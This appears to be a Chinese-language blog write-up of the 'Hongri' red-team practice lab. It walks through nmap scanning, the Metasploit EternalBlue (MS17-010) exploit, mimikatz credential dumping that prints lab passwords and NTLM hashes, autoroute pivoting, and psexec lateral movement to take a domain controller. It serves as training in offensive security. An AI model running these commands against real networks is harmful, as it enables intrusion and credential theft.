绯想天


Nothing's changed at all?

红日靶场之五

  • ~9.06K 字

此次靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习,此靶场主要用来学习,请大家遵守网络网络安全法。

win7

sun\heart 123.com
sun\Administrator dc123.com

2008(DC)

sun\admin 2022.com

外网渗透

启动kali,nmap快速扫描网络,
显示ip共三条

1
2
3
4
5
6
nmap -sS 192.168.159.1/24

192.168.159.2 #vmware的虚拟NAT设备
192.168.159.128 #KALI本机
192.168.159.129 #未知用途的windows主机
192.168.159.254 #网关

对192.168.159.129进行详细的扫描,windows7sp1系统开放445端口,win7+445,直接永恒之蓝一把梭

nmap -A 192.168.159.129

PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: SUN)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:EF:55:69 (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: WIN7; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2022-09-20T08:11:41
|_ start_date: 2022-09-20T07:55:17
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: win7
| NetBIOS computer name: WIN7\x00
| Domain name: sun.com
| Forest name: sun.com
| FQDN: win7.sun.com
|_ System time: 2022-09-20T16:11:41+08:00
|_nbstat: NetBIOS name: WIN7, NetBIOS user: , NetBIOS MAC: 00:0c:29:ef:55:69 (VMware)
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: -1s

TRACEROUTE
HOP RTT ADDRESS
1 1.00 ms 192.168.159.129

1
2
3
4
5
6
7
8
9
10
11
12
msfdb init #初始化数据库
msfconsole #启动msf
search ms17 #搜索永恒之蓝相关模块
use auxiliary/scanner/smb/smb_ms17_010 #永恒之蓝扫描模块
set rhost 192.168.159.129 #设定目标
run #启动

[+] 192.168.159.129:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.159.129:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

#可能存在永恒之蓝漏洞

开始攻击

1
2
3
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.159.129 #设定目标
run #启动

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<meterpreter>
sysinfo

Computer        : WIN7
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : SUN
Logged On Users : 2
Meterpreter     : x64/windows

ipconfig

Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:ef:55:69
MTU          : 1500
IPv4 Address : 192.168.159.129
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::c9aa:e02b:8b69:bd07
IPv6 Netmask : ffff:ffff:ffff:ffff::

Interface 16
============
Name         : Intel(R) PRO/1000 MT Network Connection #2
Hardware MAC : 00:0c:29:ef:55:73
MTU          : 1500
IPv4 Address : 192.168.138.136
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::29a6:8a6f:d7cf:ecf2
IPv6 Netmask : ffff:ffff:ffff:ffff::

双网卡配置
外网192.168.159.129
内网192.168.138.136
还有一个内网138网段

load kiwi #meterpreter下加载kiwi模块,原mimikatz
kiwi_cmd sekurlsa::logonpasswords #抓取密码
leo

Authentication Id : 0 ; 166135 (00000000:000288f7)
Session : Interactive from 1
User Name : leo
Domain : SUN
Logon Server : DC
Logon Time : 2022/9/20 15:57:07
SID : S-1-5-21-3388020223-1982701712-4030140183-1110
msv :
[00000003] Primary
* Username : leo
* Domain : SUN
* LM : b73a13e9b7832a35aad3b435b51404ee
* NTLM : afffeba176210fad4628f0524bfe1942
* SHA1 : fa83a92197d9896cb41463b7a917528b4009c650
tspkg :
* Username : leo
* Domain : SUN
* Password : 123.com
wdigest :
* Username : leo
* Domain : SUN
* Password : 123.com
kerberos :
* Username : leo
* Domain : SUN.COM
* Password : 123.com
ssp :
credman :

Administrator

Authentication Id : 0 ; 382740 (00000000:0005d714)
Session : CachedInteractive from 1
User Name : Administrator
Domain : SUN
Logon Server : DC
Logon Time : 2022/9/20 17:20:32
SID : S-1-5-21-3388020223-1982701712-4030140183-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : SUN
* LM : c8c42d085b5e3da2e9260223765451f1
* NTLM : e8bea972b3549868cecd667a64a6ac46
* SHA1 : 3688af445e35efd8a4d4e0a9eb90b754a2f3a4ee
tspkg :
* Username : Administrator
* Domain : SUN
* Password : dc123.com
wdigest :
* Username : Administrator
* Domain : SUN
* Password : dc123.com
kerberos :
* Username : Administrator
* Domain : SUN.COM
* Password : dc123.com
ssp :
credman :

成功拿下192.168.159.129外网机

内网渗透

1
2
3
4
5
6
7
准备msf路由
meterpreter> run autoroute -s 192.168.138.0/24
添加去往138网段的路由
meterpreter> run autoroute -s 192.168.138.0/24
添加回到159网段的路由

bg #将session挂入后台

内网扫描

1
2
3
4
5
6
7
8
9
<msf>
use auxiliary/scanner/discovery/arp_sweep #使用arp扫描模块
set rhosts 192.168.138.0/24 #设定目标
run #启动

#结果如下
192.168.138.2 #vmware虚拟NAT设备
192.168.138.136 #已经获得shell的机器
192.168.138.138 #未知型号的主机
1
2
3
4
5
端口扫描
<msf>
use auxiliary/scanner/portscan/tcp
set rhosts 192.168.138.138 #设定目标
run #启动

开始攻击

开放445端口,server2008+445,继续试试ms17-010一把梭

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<msf>
use exploit/windows/smb/ms17_010_eternalblue 
set rhosts 192.168.138.138
set lport 192.168.159.129
set lport 6666
run

[*] Started reverse TCP handler on 192.168.159.129:6666 via the meterpreter on session 1
[*] 192.168.138.138:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.138.138:445   - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 HPC Edition 7600 x64 (64-bit)
[*] 192.168.138.138:445   - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.138.138:445 - The target is vulnerable.
[-] 192.168.138.138:445 - Could not make SMBv1 connection

失败了,原因是server2008即使开启了445端口,默认匿名管道也是关闭的,导致445无法登录,所以无法利用

不急,试试另一种横向移动的方法

psexec

根据之前在129主机上的kiwi抓出来的结果看
主机在一个叫做SUN的域之中
有一个leo的账户,密码是123.com
还有一个adminstrator的账户,密码是dc123.com
这里直接以administrator身份登录smb

1
2
3
4
5
6
7
use exploit/windows/smb/psexec 
set rhosts 192.168.138.138 #设定目标
set SMBdomin SUN #设定域名
set SMBuser Administrator #设定账户
set SMBpass dc123.com #设定密码
set payload windows/meterpreter/bind_tcp #设定payload为主动连接
run #启动

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<meterpreter>
sysinfo
Computer        : DC
OS              : Windows 2008 R2 (6.1 Build 7600).
Architecture    : x64
System Language : zh_CN
Domain          : SUN
Logged On Users : 3
Meterpreter     : x86/windows

# 居然是x86,不能忍,换到x64进程
# 随便找一个system权限的64位进程,比如这个332
332   272   wininit.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe

migrate 332
[*] Migrating from 2840 to 332...
[*] Migration completed successfully.

sysinfo
Computer        : DC
OS              : Windows 2008 R2 (6.1 Build 7600).
Architecture    : x64
System Language : zh_CN
Domain          : SUN
Logged On Users : 3
Meterpreter     : x64/windows
# 舒适了

抓内网密码

1
2
3
<meterpreter>
load kiwi #meterpreter下加载kiwi模块,原mimikatz
kiwi_cmd sekurlsa::logonpasswords #抓取密码
admin

Authentication Id : 0 ; 132311 (00000000:000204d7)
Session : Interactive from 1
User Name : admin
Domain : SUN
Logon Server : DC
Logon Time : 2022/9/20 15:57:27
SID : S-1-5-21-3388020223-1982701712-4030140183-1000
msv :
[00000003] Primary
* Username : admin
* Domain : SUN
* LM : 2832ea1cecc55ba41486235a2333e4d2
* NTLM : 7ca86fb63f8ac3995f565d297aaf0357
* SHA1 : 2761ddfcd8cedee1b6367a9b4812dc597a49c5ee
tspkg :
* Username : admin
* Domain : SUN
* Password : 2022.com
wdigest :
* Username : admin
* Domain : SUN
* Password : 2022.com
kerberos :
* Username : admin
* Domain : SUN.COM
* Password : 2022.com
ssp :
credman :

成功拿下192.168.138.138内网机和域控账户

结束

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可
, ,